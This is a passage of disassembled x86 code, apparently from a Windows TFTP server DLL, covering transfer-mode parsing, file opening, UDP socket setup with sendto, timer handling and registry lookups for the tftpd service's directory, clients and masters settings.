mov [ebp+lpCriticalSection], eax
jz short loc_1002DE4
cmp eax, ebx
jge short loc_1002DF7
push ebx ; int
push 3 ; hostshort
push dword ptr [edi+8] ; s
lea eax, [edi+0FFF1h]
add edi, 0Ch
push eax ; int
push edi ; to
call sub_100230A
loc_1002DE4: ; CODE XREF: sub_1002CE6+BA�j
; sub_1002CE6+E2�j
cmp esi, ebx
jz short loc_1002DEF
push esi ; lpCriticalSection
call ds:LeaveCriticalSection
loc_1002DEF: ; CODE XREF: sub_1002CE6+100�j
push 1
pop eax
jmp loc_1002EBC
; ---------------------------------------------------------------------------
loc_1002DF7: ; CODE XREF: sub_1002CE6+E6�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
ja loc_1002EB3
mov ebx, ds:htons
push 4 ; hostshort
call ebx ; htons
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax ; hostshort
call ebx ; htons
mov [esi+3Ah], ax
lea eax, [edi+0Ch]
push 10h ; tolen
xor ebx, ebx
push eax ; to
push ebx ; flags
lea eax, [esi+38h]
push 4 ; len
push eax ; buf
push dword ptr [esi+20h] ; s
call ds:sendto ; sendto
mov [ebp+lpCriticalSection], eax
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002E74
cmp [esi+10028h], ebx
mov [esi+1000Ch], ebx
jnz short loc_1002E5F
mov dword ptr [esi+10000h], 3E8h
loc_1002E5F: ; CODE XREF: sub_1002CE6+16D�j
mov ecx, [esi+10000h]
push ecx
push ecx
push eax
push dword_10060A0
call ds:RtlUpdateTimer ; RtlUpdateTimer
loc_1002E74: ; CODE XREF: sub_1002CE6+15F�j
cmp [ebp+lpCriticalSection], 0FFFFFFFFh
jnz short loc_1002E80
call ds:WSAGetLastError ; WSAGetLastError
loc_1002E80: ; CODE XREF: sub_1002CE6+192�j
mov eax, [edi+2Ch]
sub eax, 4
cmp eax, [edi+20h]
jnb short loc_1002EB3
mov eax, [esi+10004h]
cmp eax, ebx
jz short loc_1002EA3
push ebx
push eax
push dword_10060A0
call ds:RtlDeleteTimer ; RtlDeleteTimer
loc_1002EA3: ; CODE XREF: sub_1002CE6+1AD�j
mov [esi+10004h], ebx
mov dword ptr [esi+10008h], 4
loc_1002EB3: ; CODE XREF: sub_1002CE6+A4�j
; sub_1002CE6+B0�j ...
push esi ; lpCriticalSection
call ds:LeaveCriticalSection
xor eax, eax
loc_1002EBC: ; CODE XREF: sub_1002CE6+10C�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002CE6 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC3 proc near ; CODE XREF: sub_1002EC8+22�p
; sub_1002EC8+2B�p
xor eax, eax
retn 8
sub_1002EC3 endp
; =============== S U B R O U T I N E =======================================
sub_1002EC8 proc near ; CODE XREF: sub_1001A91+254�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+8]
call sub_10028B5
test eax, eax
jz short loc_1002F0A
mov ecx, [eax+24h]
dec ecx
jz short loc_1002F03
dec ecx
jz short loc_1002EFA
dec ecx
jz short loc_1002EF1
dec ecx
jnz short loc_1002F0A
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EF1: ; CODE XREF: sub_1002EC8+1B�j
push esi
push eax
call sub_1002EC3
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002EFA: ; CODE XREF: sub_1002EC8+18�j
push esi ; int
push eax ; lpCriticalSection
call sub_1002CE6
jmp short loc_1002F0A
; ---------------------------------------------------------------------------
loc_1002F03: ; CODE XREF: sub_1002EC8+15�j
push esi ; int
push eax ; lpCriticalSection
call sub_1002B5E
loc_1002F0A: ; CODE XREF: sub_1002EC8+F�j
; sub_1002EC8+1E�j ...
pop esi
retn 4
sub_1002EC8 endp
; =============== S U B R O U T I N E =======================================
sub_1002F0E proc near ; CODE XREF: sub_1002F31+20�p
; sub_100333A+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jbe short loc_1002F27
loc_1002F16: ; CODE XREF: sub_1002F0E+17�j
mov ecx, [esp+arg_0]
cmp byte ptr [eax+ecx], 0
jz short loc_1002F2C
inc eax
cmp eax, [esp+arg_4]
jb short loc_1002F16
loc_1002F27: ; CODE XREF: sub_1002F0E+6�j
xor eax, eax
locret_1002F29: ; CODE XREF: sub_1002F0E+21�j
retn 8
; ---------------------------------------------------------------------------
loc_1002F2C: ; CODE XREF: sub_1002F0E+10�j
push 1
pop eax
jmp short locret_1002F29
sub_1002F0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002F31 proc near ; CODE XREF: sub_1001A91+223�p
; DATA XREF: sub_1001A91+1FC�o
name = sockaddr ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
to = dword ptr -8
Src = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
and [ebp+var_10], 0
and [ebp+var_14], 0
push esi
mov esi, [ebp+arg_0]
push edi
push 0FFBAh
lea ebx, [esi+36h]
push ebx
mov [ebp+var_18], ebx
call sub_1002F0E
test eax, eax
jz loc_100330F
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
push 10034h ; Size
repne scasb
not ecx
dec ecx
lea eax, [ecx+ebx+1]
mov [ebp+Src], eax
call ds:malloc ; malloc
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003331
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
rep stosd
push dword ptr [esi+10h] ; in
call ds:inet_ntoa ; inet_ntoa
mov [ebp+to], eax
mov ax, [esi+0Eh]
push eax ; hostshort
call ds:htons ; htons
mov edi, [ebp+Src]
mov [ebp+var_C], edi
mov al, [edi]
test al, al
jz short loc_1002FCD
loc_1002FB5: ; CODE XREF: sub_1002F31+97�j
movsx eax, al
push eax ; C
call ds:tolower ; tolower
mov [edi], al
mov al, [edi+1]
inc edi
pop ecx
test al, al
jnz short loc_1002FB5
mov [ebp+var_C], edi
loc_1002FCD: ; CODE XREF: sub_1002F31+82�j
mov edi, [ebp+Src]
mov eax, offset aNetascii ; "netascii"
loc_1002FD5: ; CODE XREF: sub_1002F31+C0�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_1002FF7
test cl, cl
jz short loc_1002FF3
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_1002FF7
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1002FD5
loc_1002FF3: ; CODE XREF: sub_1002F31+AE�j
xor eax, eax
jmp short loc_1002FFC
; ---------------------------------------------------------------------------
loc_1002FF7: ; CODE XREF: sub_1002F31+AA�j
; sub_1002F31+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_1002FFC: ; CODE XREF: sub_1002F31+C4�j
test eax, eax
jz short loc_1003037
mov edi, [ebp+Src]
mov eax, offset aOctet ; "octet"
loc_1003008: ; CODE XREF: sub_1002F31+F3�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100302A
test cl, cl
jz short loc_1003026
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100302A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_1003008
loc_1003026: ; CODE XREF: sub_1002F31+E1�j
xor eax, eax
jmp short loc_100302F
; ---------------------------------------------------------------------------
loc_100302A: ; CODE XREF: sub_1002F31+DD�j
; sub_1002F31+EB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100302F: ; CODE XREF: sub_1002F31+F7�j
test eax, eax
jnz loc_10032F6
loc_1003037: ; CODE XREF: sub_1002F31+CD�j
mov edi, [ebp+var_18]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esi+1FFADh]
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+Src], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_1003071
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10030CB
; ---------------------------------------------------------------------------
loc_1003071: ; CODE XREF: sub_1002F31+137�j
push [ebp+to]
push offset Data
call sub_10039D6
test eax, eax
jnz short loc_1003093
push [ebp+to]
push offset byte_1005D20
call sub_10039D6
test eax, eax
jz short loc_10030A4
loc_1003093: ; CODE XREF: sub_1002F31+14F�j
push [ebp+Src]
push offset byte_1005D58
call sub_10039D6
test eax, eax
jnz short loc_10030B0
loc_10030A4: ; CODE XREF: sub_1002F31+160�j
call ds:_errno ; _errno
push 0
push 2
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030B0: ; CODE XREF: sub_1002F31+171�j
push (offset dword_1005E07+1) ; int
push 0FFBCh ; int
push [ebp+Src] ; Src
call sub_100273D
test eax, eax
jnz short loc_10030CF
push offset aFileNameTooLon ; "File name too long"
loc_10030CB: ; CODE XREF: sub_1002F31+13E�j
push 0
jmp short loc_1003100
; ---------------------------------------------------------------------------
loc_10030CF: ; CODE XREF: sub_1002F31+193�j
push 8000h
push [ebp+Src]
call ds:_open ; _open
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebx+1002Ch], eax
jnz short loc_1003116
mov esi, ds:_errno
call esi ; _errno
push dword ptr [eax] ; dwErrCode
call ds:SetLastError
call esi ; _errno
push 0
push 1
loc_1003100: ; CODE XREF: sub_1002F31+17D�j
; sub_1002F31+19C�j
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx
push eax
jmp loc_1003308
; ---------------------------------------------------------------------------
loc_1003116: ; CODE XREF: sub_1002F31+1B7�j
mov edi, ds:_lseek
push 2
push 0
push eax
call edi ; _lseek
mov esi, [ebp+arg_0]
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_1003140
push 0
push 0
mov [esi+24h], eax
push dword ptr [ebx+1002Ch]
call edi ; _lseek
add esp, 0Ch
loc_1003140: ; CODE XREF: sub_1002F31+1FB�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003159
mov edi, ds:_errno
call edi ; _errno
call edi ; _errno
push dword ptr [eax] ; dwErrCode
call ds:SetLastError
jmp short loc_1003197
; ---------------------------------------------------------------------------
loc_1003159: ; CODE XREF: sub_1002F31+212�j
push 0 ; protocol
push 2 ; type
push 2 ; af
call ds:socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+Src], edi
jz short loc_1003191
mov eax, [esi+1Ch]
and word ptr [ebp+name.sa_data], 0
mov dword ptr [ebp+name.sa_data+2], eax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
mov [ebp+name.sa_family], 2
call ds:bind ; bind
test eax, eax
jz short loc_10031A3
loc_1003191: ; CODE XREF: sub_1002F31+23C�j
call ds:WSAGetLastError ; WSAGetLastError
loc_1003197: ; CODE XREF: sub_1002F31+226�j
push offset aInsufficientRe ; "Insufficient resources"
push 0
jmp loc_10032FA
; ---------------------------------------------------------------------------
loc_10031A3: ; CODE XREF: sub_1002F31+25E�j
push ebx ; lpCriticalSection
mov [esi+8], edi
call ds:InitializeCriticalSection ; InitializeCriticalSection
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+to], esi
movsd
movsd
movsd
movsd
xor edi, edi
push edi ; lpName
push edi ; bInitialState
push edi ; bManualReset
push edi ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
cmp eax, edi
mov [ebx+0FFF8h], eax
jz short loc_10031E8
push 2 ; char
push eax ; hEventObject
push [ebp+Src] ; s
call sub_100188E
cmp eax, edi
mov [ebx+0FFFCh], eax
jnz short loc_10031F3
loc_10031E8: ; CODE XREF: sub_1002F31+2A0�j
call ds:GetLastError
jmp loc_1003312
; ---------------------------------------------------------------------------
loc_10031F3: ; CODE XREF: sub_1002F31+2B5�j
add ebx, 18h
push ebx
call sub_100287F
push 1
pop esi
push [ebp+Src]
mov [ebp+var_14], esi
call sub_10028B5
mov ebx, eax
cmp ebx, edi
jz loc_1003312
lea edi, [ebx+10028h]
lea eax, [ebx+38h]
push edi ; int
push eax ; int
lea eax, [ebx+10024h]
mov [ebp+var_10], esi
push eax ; int
mov eax, [ebp+var_C]
push esi ; int
mov esi, [ebp+arg_0]
inc eax
push eax ; Str1
push esi ; int
call sub_10023D8
test eax, eax
jnz loc_1003312
cmp [edi], eax
jz short loc_1003255
mov eax, [esi+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_100325F
; ---------------------------------------------------------------------------
loc_1003255: ; CODE XREF: sub_1002F31+311�j
mov dword ptr [ebx+10000h], 3E8h
loc_100325F: ; CODE XREF: sub_1002F31+322�j
mov eax, [ebx+10000h]
push 0
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call ds:RtlCreateTimer ; RtlCreateTimer
push 1
pop edi
mov [ebx+24h], edi
mov eax, [esi+20h]
push esi
push ebx
mov [ebx+10018h], eax
mov [ebx+10014h], di
call sub_10027E1
push 10h ; tolen
xor ecx, ecx
push [ebp+to] ; to
cmp eax, ecx
mov [ebx+1000Ch], ecx
push ecx ; flags
push dword ptr [ebx+10020h] ; len
jz short loc_10032D9
lea eax, [ebx+38h]
push eax ; buf
push [ebp+Src] ; s
call ds:sendto ; sendto
mov ecx, [ebx+1001Ch]
cmp ecx, [esi+20h]
jnb short loc_10032E9
mov [ebx+10030h], edi
jmp short loc_10032E9
; ---------------------------------------------------------------------------
loc_10032D9: ; CODE XREF: sub_1002F31+386�j
add esi, 0FFF1h
push esi ; buf
push [ebp+Src] ; s
call ds:sendto ; sendto
loc_10032E9: ; CODE XREF: sub_1002F31+39E�j
; sub_1002F31+3A6�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003312
call ds:WSAGetLastError ; WSAGetLastError
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_10032F6: ; CODE XREF: sub_1002F31+100�j
push 0 ; int
push 4 ; hostshort
loc_10032FA: ; CODE XREF: sub_1002F31+26D�j
push dword ptr [esi+8] ; s
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax ; int
push esi ; to
loc_1003308: ; CODE XREF: sub_1002F31+1E0�j
call sub_100230A
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_100330F: ; CODE XREF: sub_1002F31+27�j
mov ebx, [ebp+arg_0]
loc_1003312: ; CODE XREF: sub_1002F31+2BD�j
; sub_1002F31+2DD�j ...
test ebx, ebx
jz short loc_1003331
cmp [ebp+var_10], 0
jz short loc_1003323
push ebx ; lpCriticalSection
call ds:LeaveCriticalSection
loc_1003323: ; CODE XREF: sub_1002F31+3E9�j
cmp [ebp+var_14], 0
jnz short loc_1003331
push ebx ; Memory
call ds:free ; free
pop ecx
loc_1003331: ; CODE XREF: sub_1002F31+50�j
; sub_1002F31+3E3�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_1002F31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100333A proc near ; DATA XREF: sub_1001A91+20F�o
name = sockaddr ptr -28h
to = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = dword ptr -8
s = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
and [ebp+var_10], 0
and [ebp+var_14], 0
push ebx
push esi
push edi
push 10034h ; Size
call ds:malloc ; malloc
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003731
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
push 0FFBAh
rep stosd
mov eax, [ebp+arg_0]
lea esi, [eax+36h]
push esi
mov [ebp+s], esi
call sub_1002F0E
test eax, eax
jz loc_1003712
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [ebp+arg_0]
not ecx
push dword ptr [edi+10h] ; in
dec ecx
lea esi, [ecx+esi+1]
call ds:inet_ntoa ; inet_ntoa
mov [ebp+to], eax
mov ax, [edi+0Eh]
push eax ; hostshort
call ds:htons ; htons
cmp byte ptr [esi], 0
mov edi, esi
mov [ebp+var_C], edi
jz short loc_10033E1
loc_10033BC: ; CODE XREF: sub_100333A+A2�j
movsx eax, byte ptr [edi]
push eax ; C
call ds:isupper ; isupper
test eax, eax
movsx eax, byte ptr [edi]
pop ecx
jz short loc_10033D6
push eax ; C
call ds:tolower ; tolower
pop ecx
loc_10033D6: ; CODE XREF: sub_100333A+92�j
mov [edi], al
inc edi
cmp byte ptr [edi], 0
jnz short loc_10033BC
mov [ebp+var_C], edi
loc_10033E1: ; CODE XREF: sub_100333A+80�j
mov eax, offset aNetascii ; "netascii"
mov edi, esi
loc_10033E8: ; CODE XREF: sub_100333A+CA�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100340A
test cl, cl
jz short loc_1003406
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100340A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_10033E8
loc_1003406: ; CODE XREF: sub_100333A+B8�j
xor eax, eax
jmp short loc_100340F
; ---------------------------------------------------------------------------
loc_100340A: ; CODE XREF: sub_100333A+B4�j
; sub_100333A+C2�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100340F: ; CODE XREF: sub_100333A+CE�j
test eax, eax
jnz short loc_100341F
mov dword ptr [ebx+10030h], 4000h
jmp short loc_100345D
; ---------------------------------------------------------------------------
loc_100341F: ; CODE XREF: sub_100333A+D7�j
mov edi, offset aOctet ; "octet"
loc_1003424: ; CODE XREF: sub_100333A+106�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_1003446
test al, al
jz short loc_1003442
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_1003446
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_1003424
loc_1003442: ; CODE XREF: sub_100333A+F4�j
xor eax, eax
jmp short loc_100344B
; ---------------------------------------------------------------------------
loc_1003446: ; CODE XREF: sub_100333A+F0�j
; sub_100333A+FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100344B: ; CODE XREF: sub_100333A+10A�j
test eax, eax
jnz loc_10036F8
mov dword ptr [ebx+10030h], 8000h
loc_100345D: ; CODE XREF: sub_100333A+E3�j
mov eax, [ebp+arg_0]
mov edi, [ebp+s]
or ecx, 0FFFFFFFFh
lea edx, [eax+1FFADh]
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+Src], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_100349A
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10034DF
; ---------------------------------------------------------------------------
loc_100349A: ; CODE XREF: sub_100333A+157�j
push [ebp+to]
push offset byte_1005D20
call sub_10039D6
test eax, eax
jz loc_10036EC
push [ebp+s]
push offset byte_1005D90
call sub_10039D6
test eax, eax
jz loc_10036EC
push (offset dword_1005E07+1) ; int
push 0FFBCh ; int
push [ebp+Src] ; Src
call sub_100273D
test eax, eax
jnz short loc_10034E6
push offset aFileNameTooLon ; "File name too long"
loc_10034DF: ; CODE XREF: sub_100333A+15E�j
push 0
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_10034E6: ; CODE XREF: sub_100333A+19E�j
push 180h
push 8302h
push [ebp+Src]
call ds:_open ; _open
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+1002Ch], eax
jnz short loc_100351E
mov esi, ds:_errno
call esi ; _errno
call esi ; _errno
push dword ptr [eax] ; dwErrCode
call ds:SetLastError
jmp loc_10036F2
; ---------------------------------------------------------------------------
loc_100351E: ; CODE XREF: sub_100333A+1CB�j
xor esi, esi
push esi ; protocol
push 2 ; type
push 2 ; af
call ds:socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+s], edi
jnz short loc_1003546
call ds:WSAGetLastError ; WSAGetLastError
push offset aInsufficientRe ; "Insufficient resources"
push esi
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_1003546: ; CODE XREF: sub_100333A+1F9�j
mov word ptr [ebp+name.sa_data], si
mov esi, [ebp+arg_0]
push 10h ; namelen
mov [ebp+name.sa_family], 2
mov eax, [esi+1Ch]
mov dword ptr [ebp+name.sa_data+2], eax
lea eax, [ebp+name]
push eax ; name
push edi ; s
call ds:bind ; bind
test eax, eax
jz short loc_100358A
call ds:WSAGetLastError ; WSAGetLastError
push offset aInsufficientRe ; "Insufficient resources"
push 0
push dword ptr [esi+8]
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax
push esi
jmp loc_100370D
; ---------------------------------------------------------------------------
loc_100358A: ; CODE XREF: sub_100333A+22E�j
lea eax, [ebx+10028h]
mov [esi+8], edi
push eax ; int
lea eax, [ebx+38h]
push eax ; int
lea eax, [ebx+10024h]
push eax ; int
mov eax, [ebp+var_C]
inc eax
push 2 ; int
push eax ; Str1
push esi ; int
call sub_10023D8
test eax, eax
jnz loc_1003712
push ebx ; lpCriticalSection
call ds:InitializeCriticalSection ; InitializeCriticalSection
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+to], esi
movsd
movsd
movsd
movsd
xor esi, esi
push esi ; lpName
push esi ; bInitialState
push esi ; bManualReset
push esi ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
cmp eax, esi
mov [ebx+0FFF8h], eax
jz short loc_10035F8
push 2
pop edi
push edi ; char
push eax ; hEventObject
push [ebp+s] ; s
call sub_100188E
cmp eax, esi
mov [ebx+0FFFCh], eax
jnz short loc_1003603
loc_10035F8: ; CODE XREF: sub_100333A+2A5�j
call ds:GetLastError
jmp loc_1003712
; ---------------------------------------------------------------------------
loc_1003603: ; CODE XREF: sub_100333A+2BC�j
add ebx, 18h
push ebx
call sub_100287F
push [ebp+s]
mov [ebp+var_14], 1
call sub_10028B5
mov ebx, eax
cmp ebx, esi
jz loc_1003712
xor esi, esi
mov [ebp+var_10], 1
cmp [ebx+10028h], esi
jz short loc_100364A
mov eax, [ebp+arg_0]
mov eax, [eax+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_1003654
; ---------------------------------------------------------------------------
loc_100364A: ; CODE XREF: sub_100333A+2FA�j
mov dword ptr [ebx+10000h], 3E8h
loc_1003654: ; CODE XREF: sub_100333A+30E�j
mov eax, [ebx+10000h]
push esi
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call ds:RtlCreateTimer ; RtlCreateTimer
mov eax, [ebp+arg_0]
mov ecx, [ebx+10024h]
mov [ebx+24h], edi
cmp ecx, esi
mov eax, [eax+20h]
mov [ebx+10018h], eax
lea eax, [ebx+10024h]
jz short loc_10036A1
mov [ebx+10020h], ecx
mov [eax], esi
jmp short loc_10036C5
; ---------------------------------------------------------------------------
loc_10036A1: ; CODE XREF: sub_100333A+35B�j
mov esi, ds:htons
push 4
pop edi
push edi ; hostshort
call esi ; htons
mov [ebx+38h], ax
mov ax, [ebx+10014h]
push eax ; hostshort
call esi ; htons
mov [ebx+3Ah], ax
mov [ebx+10020h], edi
loc_10036C5: ; CODE XREF: sub_100333A+365�j
push 10h ; tolen
lea eax, [ebx+38h]
push [ebp+to] ; to
push 0 ; flags
push dword ptr [ebx+10020h] ; len
push eax ; buf
push [ebp+s] ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1003712
call ds:WSAGetLastError ; WSAGetLastError
jmp short loc_1003712
; ---------------------------------------------------------------------------
loc_10036EC: ; CODE XREF: sub_100333A+16F�j
; sub_100333A+184�j
call ds:_errno ; _errno
loc_10036F2: ; CODE XREF: sub_100333A+1DF�j
push 0
push 2
jmp short loc_10036FC
; ---------------------------------------------------------------------------
loc_10036F8: ; CODE XREF: sub_100333A+113�j
push 0 ; int
push 4 ; hostshort
loc_10036FC: ; CODE XREF: sub_100333A+1A7�j
; sub_100333A+207�j ...
mov eax, [ebp+arg_0]
push dword ptr [eax+8] ; s
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx ; int
push eax ; to
loc_100370D: ; CODE XREF: sub_100333A+24B�j
call sub_100230A
loc_1003712: ; CODE XREF: sub_100333A+48�j
; sub_100333A+274�j ...
test ebx, ebx
jz short loc_1003731
cmp [ebp+var_10], 0
jz short loc_1003723
push ebx ; lpCriticalSection
call ds:LeaveCriticalSection
loc_1003723: ; CODE XREF: sub_100333A+3E0�j
cmp [ebp+var_14], 0
jnz short loc_1003731
push ebx ; Memory
call ds:free ; free
pop ecx
loc_1003731: ; CODE XREF: sub_100333A+21�j
; sub_100333A+3DA�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_100333A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100373A proc near ; CODE XREF: sub_1002CE6+D7�p
var_1FF70 = byte ptr -1FF70h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1FF70h
call _chkstk ; _chkstk
cmp [ebp+arg_C], 8000h
push esi
push edi
jnz short loc_100375A
push [ebp+arg_8]
push [ebp+arg_4]
jmp short loc_1003792
; ---------------------------------------------------------------------------
loc_100375A: ; CODE XREF: sub_100373A+16�j
mov edx, [ebp+arg_4]
xor ecx, ecx
xor esi, esi
cmp [ebp+arg_8], ecx
jle short loc_1003790
mov edi, [ebp+arg_10]
loc_1003769: ; CODE XREF: sub_100373A+54�j
cmp byte ptr [edi], 0Dh
jnz short loc_1003779
cmp byte ptr [ecx+edx], 0
jnz short loc_1003779
and byte ptr [edi], 0
jmp short loc_100378A
; ---------------------------------------------------------------------------
loc_1003779: ; CODE XREF: sub_100373A+32�j
; sub_100373A+38�j
mov al, [ecx+edx]
mov [ebp+esi+var_1FF70], al
inc esi
cmp al, 0Dh
jnz short loc_100378A
mov [edi], al
loc_100378A: ; CODE XREF: sub_100373A+3D�j
; sub_100373A+4C�j
inc ecx
cmp ecx, [ebp+arg_8]
jl short loc_1003769
loc_1003790: ; CODE XREF: sub_100373A+2A�j
push esi
push edx
loc_1003792: ; CODE XREF: sub_100373A+1E�j
push [ebp+arg_0]
call ds:_write ; _write
mov edi, eax
add esp, 0Ch
cmp edi, 0FFFFFFFFh
jnz short loc_10037B7
mov esi, ds:_errno
call esi ; _errno
call esi ; _errno
push dword ptr [eax] ; dwErrCode
call ds:SetLastError
loc_10037B7: ; CODE XREF: sub_100373A+69�j
mov eax, edi
pop edi
pop esi
leave
retn 14h
sub_100373A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10037BF proc near ; CODE XREF: sub_1001665:loc_10017F3�p
hKey = dword ptr -10h
Type = dword ptr -0Ch
cbData = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+hKey]
push ebx
xor ebx, ebx
push eax ; phkResult
push 0F003Fh ; samDesired
push ebx ; ulOptions
push offset SubKey ; "System\\CurrentControlSet\\Services\\tftpd"...
push 80000002h ; hKey
mov [ebp+var_4], ebx
call ds:RegOpenKeyExA ; RegOpenKeyExA
cmp eax, ebx
jz short loc_10037F6
call ds:GetLastError
xor eax, eax
jmp loc_100390D
; ---------------------------------------------------------------------------
loc_10037F6: ; CODE XREF: sub_10037BF+28�j
cmp byte ptr dword_1005E07+1, bl
push edi
push esi
mov esi, ds:RegQueryValueExA
jnz short loc_100383C
lea eax, [ebp+cbData]
mov [ebp+cbData], 1F4h
push eax ; lpcbData
lea eax, [ebp+Type]
push (offset dword_1005E07+1) ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset ValueName ; "directory"
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExA
cmp eax, ebx
jz short loc_1003831
call ds:GetLastError
jmp short loc_100383C
; ---------------------------------------------------------------------------
loc_1003831: ; CODE XREF: sub_10037BF+68�j
push 1
pop eax
cmp [ebp+Type], eax
jnz short loc_100383C
mov [ebp+var_4], eax
loc_100383C: ; CODE XREF: sub_10037BF+45�j
; sub_10037BF+70�j ...
push 32h
lea eax, [ebp+cbData]
pop edi
push eax ; lpcbData
lea eax, [ebp+Type]
push offset Data ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset aClients ; "clients"
push [ebp+hKey] ; hKey
mov [ebp+cbData], edi
call esi ; RegQueryValueExA
cmp eax, ebx
jz short loc_1003866
call ds:GetLastError
jmp short loc_100386F
; ---------------------------------------------------------------------------
loc_1003866: ; CODE XREF: sub_10037BF+9D�j
cmp [ebp+Type], 1
jnz short loc_100386F
inc [ebp+var_4]
loc_100386F: ; CODE XREF: sub_10037BF+A5�j
; sub_10037BF+AB�j
lea eax, [ebp+cbData]
mov [ebp+cbData], edi
push eax ; lpcbData
lea eax, [ebp+Type]
push offset byte_1005D20 ; lpData
push eax ; lpType
push ebx ; lpReserved
push offset aMasters ; "masters"
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExA
cmp eax, ebx
jz short loc_1003896
call ds:GetLastError
jmp short loc_100389F
; ---------------------------------------------------------------------------
loc_1003896: ; CODE XREF: sub_10037BF+CD�j
cmp [ebp+Type], 1
jnz short loc_100389F
inc [ebp+var_4]
loc_100389F: ; CODE XREF: sub_10037BF+D5�j
; sub_10037BF+DB�j
